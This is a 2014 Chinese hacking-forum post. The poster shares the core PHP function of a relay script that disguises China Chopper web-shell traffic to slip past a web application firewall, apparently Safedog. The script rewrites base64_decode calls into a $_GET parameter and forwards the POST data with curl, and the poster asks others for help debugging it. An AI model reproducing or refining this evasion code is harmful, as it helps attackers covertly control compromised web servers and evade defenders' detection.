本帖最后由 beizidream 于 2014-5-29 23:18 编辑
看到大牛们各种虐杀小狗,各种羡慕嫉妒恨, 于是自己弄个了简单的,
将菜刀里面的关键字base64_encode用post中转
一句话
生成中转
手动提交测试,还是妥妥的
放到菜刀,里面,结果。。。。
抓包调试,结果,结果,没有抓到,直接连一句话能抓到,中转脚本没有{:soso_e153:}
核心代码
[AppleScript] 纯文本查看 复制代码 private function SendUrl($encodResult){
if (strpos($this->config['url'],'?') === false) $url = $this->config['url'].'?124213=base64_decode';
else $url = $this->config['url'].'&124213=base64_decode';
$postData = $_POST;
$data = str_replace("base64_decode(", '$_GET[124213](', $postData);
$ch =curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0');
$output = curl_exec($ch);
curl_close($ch);
echo $output;
}
大神给点意见吧 |